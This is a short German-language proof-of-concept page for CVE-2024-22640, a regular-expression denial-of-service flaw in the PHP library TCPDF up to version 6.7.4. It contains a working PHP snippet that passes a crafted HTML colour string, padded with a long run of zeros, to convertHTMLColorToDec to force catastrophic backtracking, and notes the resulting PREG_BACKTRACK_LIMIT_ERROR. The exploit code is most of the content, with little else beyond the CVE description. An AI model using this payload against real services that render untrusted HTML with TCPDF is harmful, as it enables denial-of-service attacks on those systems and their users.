
Proof-of-Concept-Exploit für CVE-2024-22640, eine ReDoS-Schwachstelle in TCPDF <=6.7.4, ausgelöst durch manipulierte HTML-Farbeingabe, mit Demonstrationscode.
Regulärer Ausdruck Denial of Service (ReDoS)
TCPDF <= 6.7.4
TCPDF parst HTML-Farbe, die manipuliertes Payload enthält.
TCPDF-Version <= 6.7.4 ist anfällig für ReDoS (Regular Expression Denial of Service), wenn eine nicht vertrauenswürdige HTML-Seite mit einer manipulierten Farbe geparst wird.
<?php
require_once('../tcpdf.php');
$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
Hinweis: Überprüfung mit preg_last_error() nach der anfälligen Codezeile führt dazu, dass der reguläre Ausdruck mit PREG_BACKTRACK_LIMIT_ERROR beendet wird.